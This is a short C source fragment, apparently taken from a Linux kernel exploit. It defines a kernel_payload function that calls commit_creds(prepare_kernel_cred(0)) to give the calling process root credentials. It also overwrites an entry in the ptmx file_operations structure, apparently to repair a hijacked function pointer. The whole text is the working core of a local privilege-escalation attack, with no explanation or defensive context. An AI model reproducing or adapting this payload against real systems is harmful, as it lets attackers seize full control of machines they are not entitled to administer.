
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int (* _prepare_kernel_cred ) (int ) ;
typedef int (* _commit_creds ) (int ) ;


 int COMMIT_CREDS ;
 scalar_t__ FOPS_RELEASE_OFFSET ;
 int PREPARE_KERNEL_CRED ;
 scalar_t__ PTMX_FOPS ;

int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
    _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
    _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

    *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1;
    commit_creds(prepare_kernel_cred(0));

    return -1;
}
